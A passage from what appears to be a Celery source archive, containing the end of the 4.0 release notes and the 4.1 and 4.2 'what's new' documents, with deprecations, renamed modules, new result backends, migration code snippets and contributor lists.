:setting:`event_queue_expires` setting by default. The queues will now expire after 60 seconds after the monitor stops consuming from it. - Fixed a bug where a None value wasn't handled properly. Fix contributed by **Dongweiming**. - New :setting:`event_queue_prefix` setting can now be used to change the default ``celeryev`` queue prefix for event receiver queues. Contributed by **Takeshi Kanemoto**. - ``State.tasks_by_type`` and ``State.tasks_by_worker`` can now be used as a mapping for fast access to this information. Deployment ~~~~~~~~~~ - Generic init-scripts now support :envvar:`CELERY_SU` and :envvar:`CELERYD_SU_ARGS` environment variables to set the path and arguments for :command:`su` (:manpage:`su(1)`). - Generic init-scripts now better support FreeBSD and other BSD systems by searching :file:`/usr/local/etc/` for the configuration file. Contributed by **Taha Jahangir**. - Generic init-script: Fixed strange bug for ``celerybeat`` where restart didn't always work (Issue #3018). - The systemd init script now uses a shell when executing services. Contributed by **Tomas Machalek**. Result Backends ~~~~~~~~~~~~~~~ - Redis: Now has a default socket timeout of 120 seconds. The default can be changed using the new :setting:`redis_socket_timeout` setting. Contributed by **Raghuram Srinivasan**. - RPC Backend result queues are now auto delete by default (Issue #2001). - RPC Backend: Fixed problem where exception wasn't deserialized properly with the json serializer (Issue #2518). Fix contributed by **Allard Hoeve**. - CouchDB: The backend used to double-json encode results. Fix contributed by **Andrew Stewart**. - CouchDB: Fixed typo causing the backend to not be found (Issue #3287). Fix contributed by **Andrew Stewart**. - MongoDB: Now supports setting the :setting:`result_serialzier` setting to ``bson`` to use the MongoDB libraries own serializer. 
Contributed by **Davide Quarta**. - MongoDB: URI handling has been improved to use database name, user and password from the URI if provided. Contributed by **Samuel Jaillet**. - SQLAlchemy result backend: Now ignores all result engine options when using NullPool (Issue #1930). - SQLAlchemy result backend: Now sets max char size to 155 to deal with brain damaged MySQL Unicode implementation (Issue #1748). - **General**: All Celery exceptions/warnings now inherit from common :class:`~celery.exceptions.CeleryError`/:class:`~celery.exceptions.CeleryWarning`. (Issue #2643). Documentation Improvements ~~~~~~~~~~~~~~~~~~~~~~~~~~ Contributed by: - Adam Chainz - Amir Rustamzadeh - Arthur Vuillard - Batiste Bieler - Berker Peksag - Bryce Groff - Daniel Devine - Edward Betts - Jason Veatch - Jeff Widman - Maciej Obuchowski - Manuel Kaufmann - Maxime Beauchemin - Mitchel Humpherys - Pavlo Kapyshin - Pierre Fersing - Rik - Steven Sklar - Tayfun Sen - Wieland Hoffmann Reorganization, Deprecations, and Removals ========================================== Incompatible changes -------------------- - Prefork: Calling ``result.get()`` or joining any result from within a task now raises :exc:`RuntimeError`. In previous versions this would emit a warning. - :mod:`celery.worker.consumer` is now a package, not a module. - Module ``celery.worker.job`` renamed to :mod:`celery.worker.request`. - Beat: ``Scheduler.Publisher``/``.publisher`` renamed to ``.Producer``/``.producer``. - Result: The task_name argument/attribute of :class:`@AsyncResult` was removed. This was historically a field used for :mod:`pickle` compatibility, but is no longer needed. - Backends: Arguments named ``status`` renamed to ``state``. - Backends: ``backend.get_status()`` renamed to ``backend.get_state()``. - Backends: ``backend.maybe_reraise()`` renamed to ``.maybe_throw()`` The promise API uses .throw(), so this change was made to make it more consistent. There's an alias available, so you can still use maybe_reraise until Celery 5.0. .. _v400-unscheduled-removals: Unscheduled Removals -------------------- - The experimental :mod:`celery.contrib.methods` feature has been removed, as there were far many bugs in the implementation to be useful. - The CentOS init-scripts have been removed. These didn't really add any features over the generic init-scripts, so you're encouraged to use them instead, or something like :pypi:`supervisor`. .. _v400-deprecations-reorg: Reorganization Deprecations --------------------------- These symbols have been renamed, and while there's an alias available in this version for backward compatibility, they will be removed in Celery 5.0, so make sure you rename these ASAP to make sure it won't break for that release. Chances are that you'll only use the first in this list, but you never know: - ``celery.utils.worker_direct`` -> :meth:`celery.utils.nodenames.worker_direct`. - ``celery.utils.nodename`` -> :meth:`celery.utils.nodenames.nodename`. - ``celery.utils.anon_nodename`` -> :meth:`celery.utils.nodenames.anon_nodename`. - ``celery.utils.nodesplit`` -> :meth:`celery.utils.nodenames.nodesplit`. - ``celery.utils.default_nodename`` -> :meth:`celery.utils.nodenames.default_nodename`. - ``celery.utils.node_format`` -> :meth:`celery.utils.nodenames.node_format`. - ``celery.utils.host_format`` -> :meth:`celery.utils.nodenames.host_format`. .. _v400-removals: Scheduled Removals ------------------ Modules ~~~~~~~ - Module ``celery.worker.job`` has been renamed to :mod:`celery.worker.request`. 
This was an internal module so shouldn't have any effect. It's now part of the public API so must not change again. - Module ``celery.task.trace`` has been renamed to ``celery.app.trace`` as the ``celery.task`` package is being phased out. The module will be removed in version 5.0 so please change any import from:: from celery.task.trace import X to:: from celery.app.trace import X - Old compatibility aliases in the :mod:`celery.loaders` module has been removed. - Removed ``celery.loaders.current_loader()``, use: ``current_app.loader`` - Removed ``celery.loaders.load_settings()``, use: ``current_app.conf`` Result ~~~~~~ - ``AsyncResult.serializable()`` and ``celery.result.from_serializable`` has been removed: Use instead: .. code-block:: pycon >>> tup = result.as_tuple() >>> from celery.result import result_from_tuple >>> result = result_from_tuple(tup) - Removed ``BaseAsyncResult``, use ``AsyncResult`` for instance checks instead. - Removed ``TaskSetResult``, use ``GroupResult`` instead. - ``TaskSetResult.total`` -> ``len(GroupResult)`` - ``TaskSetResult.taskset_id`` -> ``GroupResult.id`` - Removed ``ResultSet.subtasks``, use ``ResultSet.results`` instead. TaskSet ~~~~~~~ TaskSet has been removed, as it was replaced by the ``group`` construct in Celery 3.0. If you have code like this: .. code-block:: pycon >>> from celery.task import TaskSet >>> TaskSet(add.subtask((i, i)) for i in xrange(10)).apply_async() You need to replace that with: .. code-block:: pycon >>> from celery import group >>> group(add.s(i, i) for i in xrange(10))() Events ~~~~~~ - Removals for class :class:`celery.events.state.Worker`: - ``Worker._defaults`` attribute. Use ``{k: getattr(worker, k) for k in worker._fields}``. - ``Worker.update_heartbeat`` Use ``Worker.event(None, timestamp, received)`` - ``Worker.on_online`` Use ``Worker.event('online', timestamp, received, fields)`` - ``Worker.on_offline`` Use ``Worker.event('offline', timestamp, received, fields)`` - ``Worker.on_heartbeat`` Use ``Worker.event('heartbeat', timestamp, received, fields)`` - Removals for class :class:`celery.events.state.Task`: - ``Task._defaults`` attribute. Use ``{k: getattr(task, k) for k in task._fields}``. - ``Task.on_sent`` Use ``Worker.event('sent', timestamp, received, fields)`` - ``Task.on_received`` Use ``Task.event('received', timestamp, received, fields)`` - ``Task.on_started`` Use ``Task.event('started', timestamp, received, fields)`` - ``Task.on_failed`` Use ``Task.event('failed', timestamp, received, fields)`` - ``Task.on_retried`` Use ``Task.event('retried', timestamp, received, fields)`` - ``Task.on_succeeded`` Use ``Task.event('succeeded', timestamp, received, fields)`` - ``Task.on_revoked`` Use ``Task.event('revoked', timestamp, received, fields)`` - ``Task.on_unknown_event`` Use ``Task.event(short_type, timestamp, received, fields)`` - ``Task.update`` Use ``Task.event(short_type, timestamp, received, fields)`` - ``Task.merge`` Contact us if you need this. Magic keyword arguments ~~~~~~~~~~~~~~~~~~~~~~~ Support for the very old magic keyword arguments accepted by tasks is finally removed in this version. 
If you're still using these you have to rewrite any task still using the old ``celery.decorators`` module and depending on keyword arguments being passed to the task, for example:: from celery.decorators import task @task() def add(x, y, task_id=None): print('My task id is %r' % (task_id,)) should be rewritten into:: from celery import task @task(bind=True) def add(self, x, y): print('My task id is {0.request.id}'.format(self)) Removed Settings ---------------- The following settings have been removed, and is no longer supported: Logging Settings ~~~~~~~~~~~~~~~~ ===================================== ===================================== **Setting name** **Replace with** ===================================== ===================================== ``CELERYD_LOG_LEVEL`` :option:`celery worker --loglevel` ``CELERYD_LOG_FILE`` :option:`celery worker --logfile` ``CELERYBEAT_LOG_LEVEL`` :option:`celery beat --loglevel` ``CELERYBEAT_LOG_FILE`` :option:`celery beat --logfile` ``CELERYMON_LOG_LEVEL`` celerymon is deprecated, use flower ``CELERYMON_LOG_FILE`` celerymon is deprecated, use flower ``CELERYMON_LOG_FORMAT`` celerymon is deprecated, use flower ===================================== ===================================== Task Settings ~~~~~~~~~~~~~~ ===================================== ===================================== **Setting name** **Replace with** ===================================== ===================================== ``CELERY_CHORD_PROPAGATES`` N/A ===================================== ===================================== Changes to internal API ----------------------- - Module ``celery.datastructures`` renamed to :mod:`celery.utils.collections`. - Module ``celery.utils.timeutils`` renamed to :mod:`celery.utils.time`. - ``celery.utils.datastructures.DependencyGraph`` moved to :mod:`celery.utils.graph`. - ``celery.utils.jsonify`` is now :func:`celery.utils.serialization.jsonify`. - ``celery.utils.strtobool`` is now :func:`celery.utils.serialization.strtobool`. - ``celery.utils.is_iterable`` has been removed. Instead use: .. code-block:: python isinstance(x, collections.Iterable) - ``celery.utils.lpmerge`` is now :func:`celery.utils.collections.lpmerge`. - ``celery.utils.cry`` is now :func:`celery.utils.debug.cry`. - ``celery.utils.isatty`` is now :func:`celery.platforms.isatty`. - ``celery.utils.gen_task_name`` is now :func:`celery.utils.imports.gen_task_name`. - ``celery.utils.deprecated`` is now :func:`celery.utils.deprecated.Callable` - ``celery.utils.deprecated_property`` is now :func:`celery.utils.deprecated.Property`. - ``celery.utils.warn_deprecated`` is now :func:`celery.utils.deprecated.warn` .. _v400-deprecations: Deprecation Time-line Changes ============================= See the :ref:`deprecation-timeline`. ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/history/whatsnew-4.1.rst0000664000175000017500000002006400000000000020222 0ustar00asifasif00000000000000.. _whatsnew-4.1: =========================================== What's new in Celery 4.1 (latentcall) =========================================== :Author: Omer Katz (``omer.drow at gmail.com``) .. sidebar:: Change history What's new documents describe the changes in major versions, we also have a :ref:`changelog` that lists the changes in bugfix releases (0.0.x), while older series are archived under the :ref:`history` section. 
Celery is a simple, flexible, and reliable distributed system to process vast amounts of messages, while providing operations with the tools required to maintain such a system. It's a task queue with focus on real-time processing, while also supporting task scheduling. Celery has a large and diverse community of users and contributors, you should come join us :ref:`on IRC ` or :ref:`our mailing-list `. To read more about Celery you should go read the :ref:`introduction `. While this version is backward compatible with previous versions it's important that you read the following section. This version is officially supported on CPython 2.7, 3.4, 3.5 & 3.6 and is also supported on PyPy. .. _`website`: http://celeryproject.org/ .. topic:: Table of Contents Make sure you read the important notes before upgrading to this version. .. contents:: :local: :depth: 2 Preface ======= The 4.1.0 release continues to improve our efforts to provide you with the best task execution platform for Python. This release is mainly a bug fix release, ironing out some issues and regressions found in Celery 4.0.0. We added official support for Python 3.6 and PyPy 5.8.0. This is the first time we release without Ask Solem as an active contributor. We'd like to thank him for his hard work in creating and maintaining Celery over the years. Since Ask Solem was not involved there were a few kinks in the release process which we promise to resolve in the next release. This document was missing when we did release Celery 4.1.0. Also, we did not update the release codename as we should have. We apologize for the inconvenience. For the time being, I, Omer Katz will be the release manager. Thank you for your support! *— Omer Katz* Wall of Contributors -------------------- Acey Acey9 Alan Hamlett Alan Justino da Silva Alejandro Pernin Alli Andreas Pelme Andrew de Quincey Anthony Lukach Arcadiy Ivanov Arnaud Rocher Arthur Vigil Asif Saifuddin Auvi Ask Solem BLAGA Razvan-Paul Brendan MacDonell Brian Luan Brian May Bruno Alla Chris Kuehl Christian Christopher Hoskin Daniel Hahler Daniel Huang Derek Harland Dmytro Petruk Ed Morley Eric Poelke Felipe François Voron GDR! George Psarakis J Alan Brogan James Michael DuPont Jamie Alessio Javier Domingo Cansino Jay McGrath Jian Yu Joey Wilhelm Jon Dufresne Kalle Bronsen Kirill Romanov Laurent Peuch Luke Plant Marat Sharafutdinov Marc Gibbons Marc Hörsken Michael Michael Howitz Michal Kuffa Mike Chen Mike Helmick Morgan Doocy Moussa Taifi Omer Katz Patrick Cloke Peter Bittner Preston Moore Primož Kerin Pysaoke Rick Wargo Rico Moorman Roman Sichny Ross Patterson Ryan Hiebert Rémi Marenco Salvatore Rinchiera Samuel Dion-Girardeau Sergey Fursov Simon Legner Simon Schmidt Slam <3lnc.slam@gmail.com> Static Steffen Allner Steven Steven Johns Tamer Sherif Tao Qingyun <845767657@qq.com> Tayfun Sen Taylor C. Richberger Thierry RAMORASOAVINA Tom 'Biwaa' Riat Viktor Holmqvist Viraj Vivek Anand Will Wojciech Żywno Yoichi NAKAYAMA YuLun Shih Yuhannaa abhinav nilaratna aydin csfeathers georgepsarakis orf shalev67 sww tnir 何翔宇(Sean Ho) .. note:: This wall was automatically generated from git history, so sadly it doesn't not include the people who help with more important things like answering mailing-list questions. .. _v410-important: Important Notes =============== Added support for Python 3.6 & PyPy 5.8.0 ----------------------------------------- We now run our unit test suite and integration test suite on Python 3.6.x and PyPy 5.8.0. 
We expect newer versions of PyPy to work but unfortunately we do not have the resources to test PyPy with those versions. The supported Python Versions are: - CPython 2.7 - CPython 3.4 - CPython 3.5 - CPython 3.6 - PyPy 5.8 (``pypy2``) .. _v410-news: News ==== Result Backends --------------- New DynamoDB Results Backend ~~~~~~~~~~~~~~~~~~~~~~~~~~~~ We added a new results backend for those of you who are using DynamoDB. If you are interested in using this results backend, refer to :ref:`conf-dynamodb-result-backend` for more information. Elasticsearch ~~~~~~~~~~~~~ The Elasticsearch results backend is now more robust and configurable. See :ref:`conf-elasticsearch-result-backend` for more information about the new configuration options. Redis ~~~~~ The Redis results backend can now use TLS to encrypt the communication with the Redis database server. See :ref:`conf-redis-result-backend`. MongoDB ~~~~~~~ The MongoDB results backend can now handle binary-encoded task results. This was a regression from 4.0.0 which resulted in a problem using serializers such as MsgPack or Pickle in conjunction with the MongoDB results backend. Periodic Tasks -------------- The task schedule now updates automatically when new tasks are added. Now if you use the Django database scheduler, you can add and remove tasks from the schedule without restarting Celery beat. Tasks ----- The ``disable_sync_subtasks`` argument was added to allow users to override disabling synchronous subtasks. See :ref:`task-synchronous-subtasks` Canvas ------ Multiple bugs were resolved resulting in a much smoother experience when using Canvas. ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/history/whatsnew-4.2.rst0000664000175000017500000010557700000000000020240 0ustar00asifasif00000000000000.. _whatsnew-4.2: =========================================== What's new in Celery 4.2 (windowlicker) =========================================== :Author: Omer Katz (``omer.drow at gmail.com``) .. sidebar:: Change history What's new documents describe the changes in major versions, we also have a :ref:`changelog` that lists the changes in bugfix releases (0.0.x), while older series are archived under the :ref:`history` section. Celery is a simple, flexible, and reliable distributed system to process vast amounts of messages, while providing operations with the tools required to maintain such a system. It's a task queue with focus on real-time processing, while also supporting task scheduling. Celery has a large and diverse community of users and contributors, you should come join us :ref:`on IRC ` or :ref:`our mailing-list `. To read more about Celery you should go read the :ref:`introduction `. While this version is backward compatible with previous versions it's important that you read the following section. This version is officially supported on CPython 2.7, 3.4, 3.5 & 3.6 and is also supported on PyPy. .. _`website`: http://celeryproject.org/ .. topic:: Table of Contents Make sure you read the important notes before upgrading to this version. .. contents:: :local: :depth: 2 Preface ======= The 4.2.0 release continues to improve our efforts to provide you with the best task execution platform for Python. This release is mainly a bug fix release, ironing out some issues and regressions found in Celery 4.0.0. Traditionally, releases were named after `Autechre `_'s track names. This release continues this tradition in a slightly different way. 
Each major version of Celery will use a different artist's track names as codenames. From now on, the 4.x series will be codenamed after `Aphex Twin `_'s track names. This release is codenamed after his very famous track, `Windowlicker `_. Thank you for your support! *— Omer Katz* Wall of Contributors -------------------- Aaron Harnly Aaron Harnly Aaron McMillin Aaron Ross Aaron Ross Aaron Schumacher abecciu abhinav nilaratna Acey9 Acey aclowes Adam Chainz Adam DePue Adam Endicott Adam Renberg Adam Venturella Adaptification Adrian adriano petrich Adrian Rego Adrien Guinet Agris Ameriks Ahmet Demir air-upc Aitor Gómez-Goiri Akira Matsuzaki Akshar Raaj Alain Masiero Alan Hamlett Alan Hamlett Alan Justino Alan Justino da Silva Albert Wang Alcides Viamontes Esquivel Alec Clowes Alejandro Pernin Alejandro Varas Aleksandr Kuznetsov Ales Zoulek Alexander Alexander A. Sosnovskiy Alexander Koshelev Alexander Koval Alexander Oblovatniy Alexander Oblovatniy Alexander Ovechkin Alexander Smirnov Alexandru Chirila Alexey Kotlyarov Alexey Zatelepin Alex Garel Alex Hill Alex Kiriukha Alex Koshelev Alex Rattray Alex Williams Alex Zaitsev Ali Bozorgkhan Allan Caffee Allard Hoeve allenling Alli Alman One Alman One alman-one Amir Rustamzadeh anand21nanda@gmail.com Anarchist666 Anders Pearson Andrea Rabbaglietti Andreas Pelme Andreas Savvides Andrei Fokau Andrew de Quincey Andrew Kittredge Andrew McFague Andrew Stewart Andrew Watts Andrew Wong Andrey Voronov Andriy Yurchuk Aneil Mallavarapu anentropic anh Ankur Dedania Anthony Lukach antlegrand <2t.antoine@gmail.com> Antoine Legrand Anton Anton Gladkov Antonin Delpeuch Arcadiy Ivanov areski Armenak Baburyan Armin Ronacher armo Arnaud Rocher arpanshah29 Arsenio Santos Arthur Vigil Arthur Vuillard Ashish Dubey Asif Saifuddin Auvi Asif Saifuddin Auvi ask Ask Solem Ask Solem Ask Solem Hoel aydin baeuml Balachandran C Balthazar Rouberol Balthazar Rouberol bartloop <38962178+bartloop@users.noreply.github.com> Bartosz Ptaszynski <> Batiste Bieler bee-keeper Bence Tamas Ben Firshman Ben Welsh Berker Peksag Bert Vanderbauwhede Bert Vanderbauwhede BLAGA Razvan-Paul bobbybeever bobby Bobby Powers Bohdan Rybak Brad Jasper Branko Čibej BR Brendan MacDonell Brendon Crawford Brent Watson Brian Bouterse Brian Dixon Brian Luan Brian May Brian Peiris Brian Rosner Brodie Rao Bruno Alla Bryan Berg Bryan Berg Bryan Bishop Bryan Helmig Bryce Groff Caleb Mingle Carlos Garcia-Dubus Catalin Iacob Charles McLaughlin Chase Seibert ChillarAnand Chris Adams Chris Angove Chris Chamberlin chrisclark Chris Harris Chris Kuehl Chris Martin Chris Mitchell Chris Rose Chris St. 
Pierre Chris Streeter Christian Christoph Burgmer Christopher Hoskin Christopher Lee Christopher Peplin Christopher Peplin Christoph Krybus clayg Clay Gerrard Clemens Wolff cmclaughlin Codeb Fan Colin McIntosh Conrad Kramer Corey Farwell Craig Younkins csfeathers Cullen Rhodes daftshady Dan Dan Hackner Daniel Devine Daniele Procida Daniel Hahler Daniel Hepper Daniel Huang Daniel Lundin Daniel Lundin Daniel Watkins Danilo Bargen Dan McGee Dan McGee Dan Wilson Daodao Dave Smith Dave Smith David Arthur David Arthur David Baumgold David Cramer David Davis David Harrigan David Harrigan David Markey David Miller David Miller David Pravec David Pravec David Strauss David White DDevine Denis Podlesniy Denis Shirokov Dennis Brakhane Derek Harland derek_kim dessant Dieter Adriaenssens Dima Kurguzov dimka665 dimlev dmarkey Dmitry Malinovsky Dmitry Malinovsky dmollerm Dmytro Petruk dolugen dongweiming dongweiming Dongweiming dtheodor Dudás Ádám Dustin J. Mitchell D. Yu Ed Morley Eduardo Ramírez Edward Betts Emil Stanchev Eran Rundstein ergo Eric Poelke Eric Zarowny ernop Evgeniy evildmp fatihsucu Fatih Sucu Feanil Patel Felipe Felipe Godói Rosário Felix Berger Fengyuan Chen Fernando Rocha ffeast Flavio Percoco Premoli Florian Apolloner Florian Apolloner Florian Demmer flyingfoxlee Francois Visconte François Voron Frédéric Junod fredj frol Gabriel Gao Jiangmiao GDR! GDvalle Geoffrey Bauduin georgepsarakis George Psarakis George Sibble George Tantiras Georgy Cheshkov Gerald Manipon German M. Bravo Gert Van Gool Gilles Dartiguelongue Gino Ledesma gmanipon Grant Thomas Greg Haskins gregoire Greg Taylor Greg Wilbur Guillaume Gauvrit Guillaume Gendre Gun.io Whitespace Robot Gunnlaugur Thor Briem harm Harm Verhagen Harry Moreno hclihn <23141651+hclihn@users.noreply.github.com> hekevintran honux Honza Kral Honza Král Hooksie Hsiaoming Yang Huang Huang Hynek Schlawack Hynek Schlawack Ian Dees Ian McCracken Ian Wilson Idan Kamara Ignas Mikalajūnas Igor Kasianov illes Ilya <4beast@gmail.com> Ilya Georgievsky Ionel Cristian Mărieș Ionel Maries Cristian Ionut Turturica Iurii Kriachko Ivan Metzlar Ivan Virabyan j0hnsmith Jackie Leng J Alan Brogan Jameel Al-Aziz James M. 
Allen James Michael DuPont James Pulec James Remeika Jamie Alessio Jannis Leidel Jared Biel Jason Baker Jason Baker Jason Veatch Jasper Bryant-Greene Javier Domingo Cansino Javier Martin Montull Jay Farrimond Jay McGrath jbiel jbochi Jed Smith Jeff Balogh Jeff Balogh Jeff Terrace Jeff Widman Jelle Verstraaten Jeremy Cline Jeremy Zafran jerry Jerzy Kozera Jerzy Kozera jespern Jesper Noehr Jesse jess Jess Johnson Jian Yu JJ João Ricardo Jocelyn Delalande JocelynDelalande Joe Jevnik Joe Sanford Joe Sanford Joey Wilhelm John Anderson John Arnold John Barham John Watson John Watson John Watson John Whitlock Jonas Haag Jonas Obrist Jonatan Heyman Jonathan Jordan Jonathan Sundqvist jonathan vanasco Jon Chen Jon Dufresne Josh Josh Kupershmidt Joshua "jag" Ginsberg Josue Balandrano Coronel Jozef jpellerin jpellerin JP JTill Juan Gutierrez Juan Ignacio Catalano Juan Rossi Juarez Bochi Jude Nagurney Julien Deniau julienp Julien Poissonnier Jun Sakai Justin Patrin Justin Patrin Kalle Bronsen kamalgill Kamil Breguła Kanan Rahimov Kareem Zidane Keith Perkins Ken Fromm Ken Reese keves Kevin Gu Kevin Harvey Kevin McCarthy Kevin Richardson Kevin Richardson Kevin Tran Kieran Brownlees Kirill Pavlov Kirill Romanov komu Konstantinos Koukopoulos Konstantin Podshumok Kornelijus Survila Kouhei Maeda Kracekumar Ramaraju Krzysztof Bujniewicz kuno Kxrr Kyle Kelley Laurent Peuch lead2gold Leo Dirac Leo Singer Lewis M. Kabui llllllllll Locker537 Loic Bistuer Loisaida Sam lookfwd Loren Abrams Loren Abrams Lucas Wiman lucio Luis Clara Gomez Lukas Linhart Łukasz Kożuchowski Łukasz Langa Łukasz Oleś Luke Burden Luke Hutscal Luke Plant Luke Pomfrey Luke Zapart mabouels Maciej Obuchowski Mads Jensen Manuel Kaufmann Manuel Vázquez Acosta Marat Sharafutdinov Marcelo Da Cruz Pinto Marc Gibbons Marc Hörsken Marcin Kuźmiński marcinkuzminski Marcio Ribeiro Marco Buttu Marco Schweighauser mariia-zelenova <32500603+mariia-zelenova@users.noreply.github.com> Marin Atanasov Nikolov Marius Gedminas mark hellewell Mark Lavin Mark Lavin Mark Parncutt Mark Story Mark Stover Mark Thurman Markus Kaiserswerth Markus Ullmann martialp Martin Davidsson Martin Galpin Martin Melin Matt Davis Matthew Duggan Matthew J Morrison Matthew Miller Matthew Schinckel mattlong Matt Long Matt Robenolt Matt Robenolt Matt Williamson Matt Williamson Matt Wise Matt Woodyard Mauro Rocco Maxim Bodyansky Maxime Beauchemin Maxime Vdb Mayflower mbacho mher Mher Movsisyan Michael Aquilina Michael Duane Mooring Michael Elsdoerfer michael@elsdoerfer.com Michael Elsdorfer Michael Elsdörfer Michael Fladischer Michael Floering Michael Howitz michael Michael michael Michael Peake Michael Permana Michael Permana Michael Robellard Michael Robellard Michal Kuffa Miguel Hernandez Martos Mike Attwood Mike Chen Mike Helmick mikemccabe Mikhail Gusarov Mikhail Korobov Mikołaj Milen Pavlov Misha Wolfson Mitar Mitar Mitchel Humpherys mklauber mlissner monkut Morgan Doocy Morris Tweed Morton Fox Môshe van der Sterre Moussa Taifi mozillazg mpavlov mperice mrmmm Muneyuki Noguchi m-vdb nadad Nathaniel Varona Nathan Van Gheem Nat Williams Neil Chintomby Neil Chintomby Nicholas Pilon nicholsonjf Nick Eaket <4418194+neaket360pi@users.noreply.github.com> Nick Johnson Nicolas Mota nicolasunravel Niklas Aldergren Noah Kantrowitz Noel Remy NoKriK Norman Richards NotSqrt nott ocean1 ocean1 ocean1 OddBloke Oleg Anashkin Olivier Aubert Omar Khan Omer Katz Omer Korner orarbel orf Ori Hoch outself Pablo Marti pachewise partizan Pär Wieslander Patrick Altman Patrick Cloke Patrick Patrick Stegmann 
Patrick Stegmann Patrick Zhang Paul English Paul Jensen Paul Kilgo Paul McMillan Paul McMillan Paulo Paul Pearce Pavel Savchenko Pavlo Kapyshin pegler Pepijn de Vos Peter Bittner Peter Brook Philip Garnero Pierre Fersing Piotr Maślanka Piotr Sikora PMickael PMickael Polina Giralt precious Preston Moore Primož Kerin Pysaoke Rachel Johnson Rachel Willmer raducc Raf Geens Raghuram Srinivasan Raphaël Riel Raphaël Slinckx Régis B Remigiusz Modrzejewski Rémi Marenco rfkrocktk Rick van Hattem Rick Wargo Rico Moorman Rik Rinat Shigapov Riyad Parvez rlotun rnoel Robert Knight Roberto Gaiser roderick Rodolphe Quiedeville Roger Hu Roger Hu Roman Imankulov Roman Sichny Romuald Brunet Ronan Amicel Ross Deane Ross Lawley Ross Patterson Ross Rudy Attias rumyana neykova Rumyana Neykova Rune Halvorsen Rune Halvorsen runeh Russell Keith-Magee Ryan Guest Ryan Hiebert Ryan Kelly Ryan Luckie Ryan Petrello Ryan P. Kelly Ryan P Kilby Salvatore Rinchiera Sam Cooke samjy Sammie S. Taunton Samuel Dion-Girardeau Samuel Dion-Girardeau Samuel GIFFARD Scott Cooper screeley sdcooke Sean O'Connor Sean Wang Sebastian Kalinowski Sébastien Fievet Seong Won Mun Sergey Fursov Sergey Tikhonov Sergi Almacellas Abellana Sergio Fernandez Seungha Kim shalev67 Shitikanth Silas Sewell Simon Charette Simon Engledew Simon Josi Simon Legner Simon Peeters Simon Schmidt skovorodkin Slam <3lnc.slam@gmail.com> Smirl squfrans Srinivas Garlapati Stas Rudakou Static Steeve Morin Stefan hr Berder Stefan Kjartansson Steffen Allner Stephen Weber Steven Johns Steven Parker Steven Steven Sklar Steven Skoczen Steven Skoczen Steve Peak stipa sukrit007 Sukrit Khera Sundar Raman sunfinite sww Tadej Janež Taha Jahangir Takeshi Kanemoto TakesxiSximada Tamer Sherif Tao Qingyun <845767657@qq.com> Tarun Bhardwaj Tayfun Sen Tayfun Sen Tayfun Sen tayfun Taylor C. Richberger taylornelson Theodore Dubois Theo Spears Thierry RAMORASOAVINA Thijs Triemstra Thomas French Thomas Grainger Thomas Johansson Thomas Meson Thomas Minor Thomas Wright Timo Sugliani Timo Sugliani Titusz tnir Tobias Kunze Tocho Tochev Tomas Machalek Tomasz Święcicki Tom 'Biwaa' Riat Tomek Święcicki Tom S tothegump Travis Swicegood Travis Swicegood Travis Trevor Skaggs Ujjwal Ojha unknown Valentyn Klindukh Viktor Holmqvist Vincent Barbaresi Vincent Driessen Vinod Chandru Viraj Vitaly Babiy Vitaly Vivek Anand Vlad Vladimir Gorbunov Vladimir Kryachko Vladimir Rutsky Vladislav Stepanov <8uk.8ak@gmail.com> Vsevolod Wes Turner wes Wes Winham w- whendrik Wido den Hollander Wieland Hoffmann Wiliam Souza Wil Langford William King Will Will Thompson winhamwr Wojciech Żywno W. Trevor King wyc wyc xando Xavier Damman Xavier Hardy Xavier Ordoquy xin li xray7224 y0ngdi <36658095+y0ngdi@users.noreply.github.com> Yan Kalchevskiy Yohann Rebattu Yoichi NAKAYAMA Yuhannaa YuLun Shih Yury V. Zaytsev Yuval Greenfield Zach Smith Zhang Chi Zhaorong Ma Zoran Pavlovic ztlpn 何翔宇(Sean Ho) 許邱翔 .. note:: This wall was automatically generated from git history, so sadly it doesn't not include the people who help with more important things like answering mailing-list questions. .. _v420-important: Important Notes =============== Supported Python Versions ------------------------- The supported Python Versions are: - CPython 2.7 - CPython 3.4 - CPython 3.5 - CPython 3.6 - PyPy 5.8 (``pypy2``) .. _v420-news: News ==== Result Backends --------------- New Redis Sentinel Results Backend ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Redis Sentinel provides high availability for Redis. A new result backend supporting it was added. 
Cassandra Results Backend ~~~~~~~~~~~~~~~~~~~~~~~~~ A new `cassandra_options` configuration option was introduced in order to configure the cassandra client. See :ref:`conf-cassandra-result-backend` for more information. DynamoDB Results Backend ~~~~~~~~~~~~~~~~~~~~~~~~ A new `dynamodb_endpoint_url` configuration option was introduced in order to point the result backend to a local endpoint during development or testing. See :ref:`conf-dynamodb-result-backend` for more information. Python 2/3 Compatibility Fixes ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Both the CouchDB and the Consul result backends accepted byte strings without decoding them to Unicode first. This is now no longer the case. Canvas ------ Multiple bugs were resolved resulting in a much smoother experience when using Canvas. Tasks ----- Bound Tasks as Error Callbacks ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ We fixed a regression that occurred when bound tasks are used as error callbacks. This used to work in Celery 3.x but raised an exception in 4.x until this release. In both 4.0 and 4.1 the following code wouldn't work: .. code-block:: python @app.task(name="raise_exception", bind=True) def raise_exception(self): raise Exception("Bad things happened") @app.task(name="handle_task_exception", bind=True) def handle_task_exception(self): print("Exception detected") subtask = raise_exception.subtask() subtask.apply_async(link_error=handle_task_exception.s()) Task Representation ~~~~~~~~~~~~~~~~~~~ - Shadowing task names now works as expected. The shadowed name is properly presented in flower, the logs and the traces. - `argsrepr` and `kwargsrepr` were previously not used even if specified. They now work as expected. See :ref:`task-hiding-sensitive-information` for more information. Custom Requests ~~~~~~~~~~~~~~~ We now allow tasks to use custom `request `:class: classes for custom task classes. See :ref:`task-requests-and-custom-requests` for more information. Retries with Exponential Backoff ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Retries can now be performed with exponential backoffs to avoid overwhelming external services with requests. See :ref:`task-autoretry` for more information. Sphinx Extension ---------------- Tasks were supposed to be automatically documented when using Sphinx's Autodoc was used. The code that would have allowed automatic documentation had a few bugs which are now fixed. Also, The extension is now documented properly. See :ref:`sphinx` for more information. ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/history/whatsnew-4.3.rst0000664000175000017500000004074100000000000020230 